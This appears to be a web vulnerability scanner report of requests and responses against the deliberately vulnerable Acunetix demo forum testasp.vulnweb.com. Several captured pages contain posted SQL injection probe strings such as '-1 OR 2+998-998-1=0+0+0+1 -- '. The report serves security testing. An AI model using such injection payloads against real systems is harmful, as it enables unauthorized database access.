<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:42 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=61 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4138 |
Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum @@NiQ6e </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/@@NiQ6e </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>@@NiQ6e - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=62 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:49 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=63 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=64 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4152 |
Response Body - size: 4,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=65 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4152 |
Response Body - size: 4,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:16 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=66 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4150 |
Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+998-998) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=67 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4150 |
Response Body - size: 4,150 bytes. |
